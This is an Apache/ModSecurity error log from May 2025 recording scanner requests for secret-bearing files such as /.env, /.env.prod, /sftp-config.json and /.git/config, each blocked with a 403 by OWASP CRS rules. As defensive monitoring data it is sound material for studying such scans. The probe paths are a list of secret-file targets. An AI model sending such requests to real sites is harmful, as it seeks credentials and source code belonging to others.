[Wed May 07 21:30:21.419219 2025] [:error] [pid 2975931] [client 93.123.109.81:59136] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aBu0zdzRrTkAF43aQ2rjTgAAAAU"]
[Wed May 07 21:30:21.419420 2025] [:error] [pid 2975931] [client 93.123.109.81:59136] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aBu0zdzRrTkAF43aQ2rjTgAAAAU"]
[Wed May 07 21:30:21.567949 2025] [:error] [pid 3002293] [client 93.123.109.81:59148] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aBu0za4g94IEkoEbleczxAAAAA4"]
[Wed May 07 21:30:21.568190 2025] [:error] [pid 3002293] [client 93.123.109.81:59148] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aBu0za4g94IEkoEbleczxAAAAA4"]
[Wed May 07 21:30:21.568375 2025] [:error] [pid 3002293] [client 93.123.109.81:59148] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aBu0za4g94IEkoEbleczxAAAAA4"]
[Wed May 07 21:30:23.006327 2025] [authz_core:error] [pid 2975931] [client 93.123.109.81:59258] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Wed May 07 21:30:23.119175 2025] [:error] [pid 3002293] [client 93.123.109.81:59260] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aBu0z64g94IEkoEbleczxQAAAA4"]
[Wed May 07 21:30:23.119420 2025] [:error] [pid 3002293] [client 93.123.109.81:59260] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aBu0z64g94IEkoEbleczxQAAAA4"]
[Wed May 07 21:30:23.119601 2025] [:error] [pid 3002293] [client 93.123.109.81:59260] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aBu0z64g94IEkoEbleczxQAAAA4"]
[Wed May 07 23:07:08.010617 2025] [:error] [pid 2975962] [client 15.237.130.80:57910] [client 15.237.130.80] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aBvLfLlU1_pA5vTUgya3jgAAAAk"]
[Wed May 07 23:07:08.010862 2025] [:error] [pid 2975962] [client 15.237.130.80:57910] [client 15.237.130.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aBvLfLlU1_pA5vTUgya3jgAAAAk"]
[Wed May 07 23:07:08.011038 2025] [:error] [pid 2975962] [client 15.237.130.80:57910] [client 15.237.130.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aBvLfLlU1_pA5vTUgya3jgAAAAk"]
[Mon May 12 02:59:57.885690 2025] [:error] [pid 3095523] [client 194.50.16.252:44200] [client 194.50.16.252] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCFIDX0sLzcrlAvHoEiIxgAAAAM"]
[Mon May 12 02:59:57.886026 2025] [:error] [pid 3095523] [client 194.50.16.252:44200] [client 194.50.16.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCFIDX0sLzcrlAvHoEiIxgAAAAM"]
[Mon May 12 02:59:57.886227 2025] [:error] [pid 3095523] [client 194.50.16.252:44200] [client 194.50.16.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aCFIDX0sLzcrlAvHoEiIxgAAAAM"]
[Mon May 12 02:59:57.888057 2025] [:error] [pid 3095524] [client 194.50.16.252:44196] [client 194.50.16.252] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCFIDVyJg63T84o5Ki77kQAAAAQ"]
[Mon May 12 02:59:57.888289 2025] [:error] [pid 3095524] [client 194.50.16.252:44196] [client 194.50.16.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCFIDVyJg63T84o5Ki77kQAAAAQ"]
[Mon May 12 02:59:57.888478 2025] [:error] [pid 3095524] [client 194.50.16.252:44196] [client 194.50.16.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCFIDVyJg63T84o5Ki77kQAAAAQ"]
[Mon May 12 02:59:59.248185 2025] [:error] [pid 3095782] [client 194.50.16.252:44214] [client 194.50.16.252] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "aCFID34qSUYnHJtRXO5D9QAAAAY"]
[Mon May 12 02:59:59.248450 2025] [:error] [pid 3095782] [client 194.50.16.252:44214] [client 194.50.16.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "aCFID34qSUYnHJtRXO5D9QAAAAY"]
[Mon May 12 02:59:59.248628 2025] [:error] [pid 3095782] [client 194.50.16.252:44214] [client 194.50.16.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.git/config"] [unique_id "aCFID34qSUYnHJtRXO5D9QAAAAY"]
[Mon May 12 02:59:59.634026 2025] [:error] [pid 3095521] [client 194.50.16.252:44228] [client 194.50.16.252] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "aCFID5sXMANg0RhPa2PupAAAAAE"]
[Mon May 12 02:59:59.634331 2025] [:error] [pid 3095521] [client 194.50.16.252:44228] [client 194.50.16.252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "aCFID5sXMANg0RhPa2PupAAAAAE"]
[Mon May 12 02:59:59.634503 2025] [:error] [pid 3095521] [client 194.50.16.252:44228] [client 194.50.16.252] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "aCFID5sXMANg0RhPa2PupAAAAAE"]
[Fri May 16 13:37:40.723416 2025] [:error] [pid 3201095] [client 45.148.10.172:47540] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCcjhDJLnQ9GLjZUgW8p0QAAAA4"]
[Fri May 16 13:37:40.724833 2025] [:error] [pid 3201095] [client 45.148.10.172:47540] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCcjhDJLnQ9GLjZUgW8p0QAAAA4"]
[Fri May 16 13:37:40.725020 2025] [:error] [pid 3201095] [client 45.148.10.172:47540] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCcjhDJLnQ9GLjZUgW8p0QAAAA4"]
[Fri May 16 15:05:42.831270 2025] [:error] [pid 3185170] [client 154.83.103.115:47768] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCc4JjgF2egeGr17u-HEewAAAAc"]
[Fri May 16 15:05:42.831543 2025] [:error] [pid 3185170] [client 154.83.103.115:47768] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCc4JjgF2egeGr17u-HEewAAAAc"]
[Fri May 16 15:05:42.831703 2025] [:error] [pid 3185170] [client 154.83.103.115:47768] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCc4JjgF2egeGr17u-HEewAAAAc"]
[Fri May 16 17:00:16.672529 2025] [:error] [pid 3184837] [client 54.81.185.130:58098] [client 54.81.185.130] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCdTAHXQfX5WyW27TAVKjwAAAAM"]
[Fri May 16 17:00:16.672861 2025] [:error] [pid 3184837] [client 54.81.185.130:58098] [client 54.81.185.130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCdTAHXQfX5WyW27TAVKjwAAAAM"]
[Fri May 16 17:00:16.673045 2025] [:error] [pid 3184837] [client 54.81.185.130:58098] [client 54.81.185.130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCdTAHXQfX5WyW27TAVKjwAAAAM"]
[Fri May 16 17:00:16.786790 2025] [:error] [pid 3201106] [client 196.251.83.88:57538] [client 196.251.83.88] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCdTAMz-YrnV-rFd1CajXAAAAA8"]
[Fri May 16 17:00:16.787263 2025] [:error] [pid 3201106] [client 196.251.83.88:57538] [client 196.251.83.88] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCdTAMz-YrnV-rFd1CajXAAAAA8"]
[Fri May 16 17:00:16.787713 2025] [:error] [pid 3201106] [client 196.251.83.88:57538] [client 196.251.83.88] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCdTAMz-YrnV-rFd1CajXAAAAA8"]
[Fri May 16 19:36:53.408408 2025] [:error] [pid 3184834] [client 45.144.212.129:43254] [client 45.144.212.129] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCd3tfcinR0APGx5bMQz6wAAAAA"]
[Fri May 16 19:36:53.408745 2025] [:error] [pid 3184834] [client 45.144.212.129:43254] [client 45.144.212.129] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCd3tfcinR0APGx5bMQz6wAAAAA"]
[Fri May 16 19:36:53.408918 2025] [:error] [pid 3184834] [client 45.144.212.129:43254] [client 45.144.212.129] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCd3tfcinR0APGx5bMQz6wAAAAA"]
[Fri May 16 20:36:36.396899 2025] [:error] [pid 3201094] [client 45.144.212.129:48556] [client 45.144.212.129] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCeFtGkFFL1dHKHYXszgKwAAAA0"]
[Fri May 16 20:36:36.397239 2025] [:error] [pid 3201094] [client 45.144.212.129:48556] [client 45.144.212.129] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCeFtGkFFL1dHKHYXszgKwAAAA0"]
[Fri May 16 20:36:36.397431 2025] [:error] [pid 3201094] [client 45.144.212.129:48556] [client 45.144.212.129] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aCeFtGkFFL1dHKHYXszgKwAAAA0"]
